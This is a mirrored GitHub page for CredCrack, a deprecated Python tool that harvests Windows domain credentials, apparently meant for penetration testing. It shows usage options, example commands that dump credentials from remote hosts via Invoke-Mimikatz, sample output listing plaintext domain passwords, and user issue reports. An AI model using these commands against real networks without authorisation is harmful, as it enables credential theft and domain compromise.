GithubHelp home page GithubHelp logo

credcrack's Introduction

CredCrack

⛔ [DEPRECATED]. This repo is no longer being maintained. Please consider using CrackMapExec.

Introduction

CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recusively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory. Download Invoke-Mimikatz Here

Help

usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples: 

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Examples

Enumerating Share Access

./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s

Harvesting credentials

./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

                
[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s

Contact

Contact me at @g0jhonny with any questions or features you'd like to see in the next update. For bugs submit an issue!

Credits

CredCrack couldn't have been possible without the contributions of the following individuals. You're all rockstars! @JosephBialek, @brav0hax, @altonjx and everyone else! Thank you for all your contributions and feedback to make this a better script, keep 'em coming!

credcrack's People

Contributors

jobroche avatar r3dy avatar bryant1410 avatar

Stargazers

Ilya Semennikov avatar JVormstein avatar avatar Omar El Houmadi avatar pluto avatar avatar Meo Dimitri avatar avatar avatar Kiana Dimitri avatar Mokhtar Algholi avatar sibcooks avatar KamalkaNipun avatar avatar Cyb avatar Nir Sasson avatar avatar Carsten Marmulla avatar Anand Darshan avatar avatar avatar Alestan avatar avatar Kaptian Core avatar avatar LawlessCarrot avatar Joas A Santos avatar Flavio Rodrigo Cabral Pereira avatar SMN666 avatar avatar Eugene Dobrodeev avatar avatar avatar avatar Bashy avatar avatar ^\_/^ avatar avatar dedroot avatar Dumb Head avatar Burden Haze avatar avatar avatar cvcvka5 avatar DubZ3r(0) avatar avatar shifty0g avatar avatar avatar avatar 0t4peo avatar avatar CyberQuacker avatar Daniel Serbu avatar avatar K. avatar avatar avatar Nicolas Vincent avatar Kieran avatar Joey Burke avatar avatar OkNowWhatDoYouWant avatar Scott R Barristers avatar Tyler Robinson avatar avatar IemandDood avatar James Ward-Smith avatar Suri avatar Thiago Araujo avatar topanga avatar 0xurity avatar avatar Shravan Kumar UK avatar avatar Kevin Dicks avatar cances avatar luoshu avatar Chris Lin avatar avatar Antares avatar r0eXpeR avatar 浅蓝 avatar avatar marbles12 avatar avatar avatar Tilt avatar Aleksandr Zheleznov avatar Vipul Tiwari avatar Oluwatobi Afolabi avatar avatar avatar xxyyxx13691 avatar fuzzsec avatar avatar gxwyz avatar avatar avatar avatar

Watchers

evandrix avatar wifi avatar Hans-Jörg Wieland avatar ciphersson avatar avatar Minh-Triet Pham Tran avatar Arnstein Henriksen avatar avatar avatar James Cloos avatar avatar avatar avatar akpotter avatar Mauro Risonho de Paula Assumpção avatar avatar avatar Clancey avatar avatar Aleksandr Timorin avatar Kurt De Greeff avatar xzcaz avatar (◕ᴥ◕) avatar avatar mark parkour avatar avatar Matt Wagenknecht avatar avatar Chad Baxter avatar aliz avatar avatar avatar Grimmjaw avatar Florian OTHON avatar avatar Coco avatar Brant Hale avatar Seba avatar avatar avatar avatar Shiv4x6c avatar avatar shi han wang avatar Fernando avatar Martin Boller avatar avatar Eric D avatar Patrick avatar avatar Александр avatar Gopinath M avatar avatar avatar avatar

Forkers

r3dy dipsec hotelzululima supportingit cephurs haykuro cloudcowboyco travmi z3v2cicidi yocruzer nefus1 linkp2p xila76 lancetw rossmairm ndtran lockfale dexapier atimorin siathalysedi samuelproject desdoulas johnjohnsp1 carnote peterpt scshepard securextools wrtcoder izogain lespilettemaxime 4sp1r3 zer0-t binary1985 3l3n4 volt72 famous0123 1872892142 ryandorey securitywarrior ohio813 eniac888 intosec nano6yt3 grayhats kyodule paran0ids0ul magnologan 00kush00 hackmycontrolsystem raziel-oeri kaicastledine cs-wang jijicanyu bryant1410 mgcfish sopsmattw maleus silogit rich-roth m41doror s4yhell0 beyondcy melvinvarkey danxaldanxe mehrdad-shokri ro9ueadmin rdsece marshell88 ykankaya ritter0715 c002 fuckup1337 leomatias dorkwiz azurecloudmonk r0cknrolla coderandy vincentvije modulexcite morristech nduas77 5l1v3r1 axax002 0xpwn7 an0nym0u5101 nusaibsqli radioactivetobi ch4p34un0ir dblacklotus iamanubhavsaini scottrbarristers anshumansrivastavagit justinforbes kin344 chillux cihan-ozcan 123ysys mlynchcogent cyberag3nt12

credcrack's Issues

Unable tor reach

Hi
thank you for you great work.

I've got this error when a use the credcrack.py

root@kali:~/Downloads/CredCrack-master# ./credcrack.py -d domaine -u user -f ip -l 10.247.192.217Password:

CredCrack v1.0 by Jonathan Broche (@g0jhonny)

[] Setting up the stage
[] Validating 10.247.192.200
[] Validating 10.247.192.192
[] Validating 10.247.192.182
[] Querying domain admin group from 10.247.192.200
[!] Unable to reach to 10.247.192.200
[] Querying domain admin group from 10.247.192.192
[!] Unable to reach to 10.247.192.192
[*] Querying domain admin group from 10.247.192.182
[!] Unable to reach to 10.247.192.182

do you have any idea how to resolv this please ?

thank you !

no shell no error message

What could be the problem if I just got this:

root@kali:~/CredCrack# ./credcrack.py -d workgroup -r 192.168.122.237 -u Christian -l 192.168.122.25
Password:

CredCrack v1.0 by Jonathan Broche (@g0jhonny)

[] Setting up the stage
[] Validating 192.168.122.237
[] Querying domain admin group from 192.168.122.237
[] Cleaning up
root@kali:~/CredCrack#

The "list shares" works. Thank you

Online documentation is not updated

Im Reading the (online) documentation and it says only domain and user are required. From what I see, the local host and the remote host are also required.

Also the documention is kind of sketchy on what the parameters are exactly needed and what they are for.

Standalone servers

Hi Jonathan,

First of all thanks for your great piece of software.
I tried credcrack on a standalone Windows 2008 R2 server that is not part of a domain and received the following error:

[!] User is not an admin on 10.0.1.51 or the system is not joined to a domain

The command i runned
./credcrack.py -r 10.0.1.51 -d WORKGROUP -u administrator -l 10.0.1.20

So the question is why is it not possible to run credcrack on standalone servers?

ValueError: zero length field name in format

Hello, i have an error when i execute the script:

ValueError: zero length field name in format

My python version is 2.6.6. I execute this line command:

./credcrack.py -d XXX -u XXX -f hosts -es

My exactly Error:

Traceback (most recent call last)
File "./credcrack.py", line415,
main()
File "./credcrack.py", line411, in main
print "{}[!]{} File: {} does not exist.".format'colors.red, colors.normal, args.file)
ValueError: zero length field name in format

Sorry for my bad english and thank you verymutch

[Errno 2] No such file or directory

./credcrack.py -d domain -u user -es -r 10.10.10.1

CredCrack v1.0 by Jonathan Broche (@g0jhonny)

[*] Validating 10.10.10.1
[!] Error listing shares on 10.10.10.1: [Errno 2] No such file or directory

I've always the same error whatever the options I use.
Is there a dependence i miss ?

I've try with "-F hosts"
but i got hte same message with all the IP adresses.
I've tried with a wrong password and it tells me the same...

Any idea ?
Do i need to be under Kali ?
I've a centos 7
;)

No loot?

Hello,

I have been playing around with credcrack on a domain. I can valitdate the hosts with no issue. Yet when I go to harvest details. It always comes back with no loot. The are members in the "domain admins" group. The are two screenshots below showing the information.

http://puu.sh/lqnfQ/5a924e0d25.jpg (Validating Hosts)
http://puu.sh/lqngY/bdc4a46775.jpg (Havesting)

Any idea's on why this is not working?

Thanks.

Output to file does not reflect the domain admins

When sending standard output to file in linux, highlights like yellow are not reflected in the output file.
Perhaps give a text clue to which credentials are domain admins, like (!) before the line. This way, when running this script and reviewing later from a file, the domain admins can still be identified.

Servers with different languages fail

Hi John,

Today I used credcrack on a Dutch - Windows Server 2008 R2 installation and it fails because CredCrack can't query the Domain Admins group.

On a Dutch Windows Server 2008R2 installation the group name is "Domeinadministrators". I guess this Domain admin group is different on all other Windows servers installtions that are using an other language then English.

It might be an idea to gather all those group names and make an option for it in CredCrack?

Some more info:

The error message i receive from $output:

[] Setting up the stage
[] Validating 192.168.178.23
[*] Querying domain admin group from 192.168.178.23

Kan de groepsnaam niet vinden.

Typ NET HELPMSG 2220 voor meer hulp.

[!] User is not an admin on 192.168.178.23 or the system is not joined to a domain

Translated:

Cant find groupname
Typ NET HELPMSG 2220 for more help.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.